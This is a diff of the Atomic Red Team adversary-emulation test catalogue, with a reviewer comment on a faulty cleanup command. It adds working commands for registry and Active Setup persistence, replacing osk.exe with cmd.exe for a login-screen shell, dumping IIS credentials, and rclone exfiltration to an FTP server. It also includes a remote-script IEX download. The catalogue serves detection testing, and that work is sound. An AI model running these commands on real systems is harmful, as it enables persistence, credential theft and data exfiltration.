An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
|
||||
-Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
|
||||
Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: |-
|
||||
$path = "HKCU:\Software\Microsoft\Command Processor"
|
||||
if (!(Test-Path -path $path)){
|
||||
New-Item -ItemType Key -Path $path
|
||||
}
|
||||
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
|
||||
Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
T1546.004:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -37829,14 +38033,14 @@ privilege-escalation:
|
||||
command_to_add:
|
||||
description: Command to add to the .bash_profile file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.bash_profile > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bash_profile
|
||||
name: sh
|
||||
- name: Add command to .bashrc
|
||||
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
|
||||
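Review bot: The new cleanup_command on the `.bash_profile` test removes lines by position instead of by content: `head -n '-2'` drops the last two lines of `~/.bash_profile` whatever they are, yet the executor appends only one line, so a pre-existing user line is lost, and anything appended after the test (or a second run) is cut instead of the test line. Negative counts for `head -n` are a GNU extension, so if macOS is among this test's supported_platforms (outside the hunk) the BSD `head` rejects the option and the profile is overwritten with an empty file. A fixed-string match keeps the old content-based semantics without the `/` that broke the previous sed pattern: `grep -vxF '#{command_to_add}' ~/.bash_profile > /tmp/T1546.004.cleanup; mv /tmp/T1546.004.cleanup ~/.bash_profile`. A distinct temp name also avoids reusing `/tmp/T1546.004`, which is the marker file the new default command writes. The same defect is in the `.bashrc` hunk that follows.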
@@ -37850,14 +38054,14 @@ privilege-escalation:
|
||||
command_to_add:
|
||||
description: Command to add to the .bashrc file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
T1134.005:
|
||||
technique:
|
||||
@@ -45709,7 +45913,6 @@ execution:
|
||||
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
|
||||
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: PowerShell Downgrade Attack
|
||||
auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
|
||||
description: |
|
||||
@@ -50486,7 +50689,76 @@ persistence:
|
||||
- 'Command: Command Execution'
|
||||
x_mitre_permissions_required:
|
||||
- Administrator
|
||||
atomic_tests: []
|
||||
identifier: T1547.014
|
||||
atomic_tests:
|
||||
- name: HKLM - Add atomic_test key to launch executable as part of user setup
|
||||
auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
|
||||
description: "This test will create an \"atomic_test\" key under 'HKLM:\\SOFTWARE\\Microsoft\\Active
|
||||
Setup\\Installed Components' to launch calc by configuring an active setup
|
||||
executable and \nforcing to run active setup using the \"runonce.exe /AlternateShellStartup\"
|
||||
command. \nWithout the \"runonce.exe /AlternateShellStartup\" command it would
|
||||
run during the next logon for each user.\n\nNote: If you logout before running
|
||||
the cleanup command, you will be required to go through the OOBE (out-of-box
|
||||
experience) setup sequence to log back in. \nThe payload will only run once
|
||||
unless the cleanup command is run in between tests.\n\n[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: "New-Item \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"
|
||||
-Name \"atomic_test\" -Force\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Active
|
||||
Setup\\Installed Components\\atomic_test\" \"(Default)\" \"ART TEST\" -Force\nSet-ItemProperty
|
||||
\"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\atomic_test\"
|
||||
\"StubPath\" \"#{payload}\" -Force \n& $env:SYSTEMROOT\\system32\\runonce.exe
|
||||
/AlternateShellStartup"
|
||||
cleanup_command: |-
|
||||
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Add malicious StubPath value to existing Active Setup Entry
|
||||
auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
description: "This test will add a StubPath entry to the Active Setup native
|
||||
registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
|
||||
\nSaid key doesn't have a StubPath value by default, by adding one it will
|
||||
launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
|
||||
\nWithout the last command it will normally run on next user logon. Note:
|
||||
this test will only run once successfully if no cleanup command is run in
|
||||
between test.\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: |-
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
|
||||
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing
|
||||
version number
|
||||
auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
description: "This test will decrease the version number of the 'Internet Explorer
|
||||
Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for
|
||||
the current user, \nwhich will force the StubPath payload (if set) to execute.\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1180:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -56132,7 +56404,7 @@ persistence:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
|
||||
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
||||
takeown /F C:\Windows\System32\sethc.exe /A
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
||||
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
@@ -56141,6 +56413,33 @@ persistence:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Create Symbolic Link From osk.exe to cmd.exe
|
||||
auto_generated_guid: 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
description: 'Replace accessiblity executable with cmd.exe to provide elevated
|
||||
command prompt from login screen without logging in.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
||||
cleanup_command: |
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
||||
icacls %windir%\system32\osk.exe /inheritance:d
|
||||
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
||||
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
||||
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
||||
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1504:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -57105,6 +57404,34 @@ persistence:
|
||||
mv -Force #{settings_json_tmp} #{settings_json_def}
|
||||
taskkill /F /IM "#{calculator}" > $null
|
||||
name: powershell
|
||||
- name: Add macOS LoginItem using Applescript
|
||||
auto_generated_guid: 716e756a-607b-41f3-8204-b214baf37c1d
|
||||
description: |
|
||||
Runs osascript on a file to create new LoginItem for current user.
|
||||
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
|
||||
Therefore, it can't be automated until the TCC is granted.
|
||||
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
|
||||
In addition to the `osascript` Process Events, file modification events to
|
||||
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
scriptfile:
|
||||
description: path to Applescript source to add Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa
|
||||
cleanup_script:
|
||||
description: path to Applescript source to delete Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa
|
||||
executor:
|
||||
command: 'osascript #{scriptfile}
|
||||
|
||||
'
|
||||
cleanup_command: 'osascript #{cleanup_script}
|
||||
|
||||
'
|
||||
name: bash
|
||||
T1205.001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -58643,7 +58970,6 @@ persistence:
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||
Remove-Item "#{new_startup_folder}" -Recurse -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Policy Settings Explorer Run Key
|
||||
auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
|
||||
description: "This test will create a new value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
|
||||
@@ -60448,7 +60774,8 @@ persistence:
|
||||
- description: 'AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll)
|
||||
{ exit 0} else { exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
@@ -60463,6 +60790,47 @@ persistence:
|
||||
-Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
|
||||
-Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
|
||||
Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: |-
|
||||
$path = "HKCU:\Software\Microsoft\Command Processor"
|
||||
if (!(Test-Path -path $path)){
|
||||
New-Item -ItemType Key -Path $path
|
||||
}
|
||||
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
|
||||
Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
T1546.004:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -60614,14 +60982,14 @@ persistence:
|
||||
command_to_add:
|
||||
description: Command to add to the .bash_profile file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.bash_profile > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bash_profile
|
||||
name: sh
|
||||
- name: Add command to .bashrc
|
||||
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
|
||||
@@ -60635,14 +61003,14 @@ persistence:
|
||||
command_to_add:
|
||||
description: Command to add to the .bashrc file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
T1547.002:
|
||||
technique:
|
||||
@@ -65175,6 +65543,7 @@ collection:
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
|
||||
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
|
||||
Write-Host Follow the installation prompts to continue
|
||||
cmd /c "$env:Temp\winzip.exe"
|
||||
@@ -72817,6 +73186,45 @@ credential-access:
|
||||
'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using
|
||||
list)
|
||||
auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
|
||||
description: |-
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: IIS must be installed prior to running the test
|
||||
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed")
|
||||
{exit 0} else {exit 1}
|
||||
get_prereq_command: Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
executor:
|
||||
command: |-
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using
|
||||
config)
|
||||
auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
|
||||
description: |-
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: IIS must be installed prior to running the test
|
||||
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed")
|
||||
{exit 0} else {exit 1}
|
||||
get_prereq_command: Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
executor:
|
||||
command: C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1171:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -74414,7 +74822,7 @@ credential-access:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS
|
||||
- name: Packet Capture macOS using tcpdump or tshark
|
||||
auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
|
||||
description: |
|
||||
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
|
||||
@@ -74539,6 +74947,88 @@ credential-access:
|
||||
cleanup_command: pktmon filter remove
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
|
||||
seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: "/tmp/t1040_macos_pcapdemo"
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
|
||||
and captures packets for a few seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: "/tmp/t1040_macos_pcapdemo"
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -f -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
T1552.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -83550,7 +84040,7 @@ discovery:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS
|
||||
- name: Packet Capture macOS using tcpdump or tshark
|
||||
auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
|
||||
description: |
|
||||
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
|
||||
@@ -83675,6 +84165,88 @@ discovery:
|
||||
cleanup_command: pktmon filter remove
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
|
||||
seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: "/tmp/t1040_macos_pcapdemo"
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
|
||||
and captures packets for a few seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: "/tmp/t1040_macos_pcapdemo"
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -f -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
T1135:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -102997,3 +103569,56 @@ exfiltration:
|
||||
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
|
||||
$ftp_del.GetResponse()}} catch{}
|
||||
name: powershell
|
||||
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
|
||||
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
||||
description: |-
|
||||
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
|
||||
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
ftp_server:
|
||||
description: Your own ftp server
|
||||
type: string
|
||||
default: ftp.dlptest.com
|
||||
ftp_pass:
|
||||
description: Your FTP user's password
|
||||
type: string
|
||||
default: rNrKYTX9g7z3RgJRmxWuGHbeu
|
||||
ftp_user:
|
||||
description: Your FTP username
|
||||
type: string
|
||||
default: dlpuser
|
||||
ftp_port:
|
||||
description: Your FTP's port
|
||||
type: string
|
||||
default: 21
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'Check if the exfil package exists
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit
|
||||
0} else {exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: 'fsutil file createnew C:\Users\Public\Downloads\exfil.zip
|
||||
20485760
|
||||
|
||||
'
|
||||
- description: Check if rclone zip exists
|
||||
prereq_command: 'if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip)
|
||||
{exit 0} else {exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
|
||||
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
|
||||
executor:
|
||||
command: |-
|
||||
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
|
||||
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
|
||||
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
|
||||
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
@@ -13,6 +13,10 @@ Several of the tools mentioned in associated sub-techniques may be used by both
|
||||
|
||||
- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
|
||||
|
||||
- [Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
|
||||
|
||||
- [Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -172,4 +176,88 @@ Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
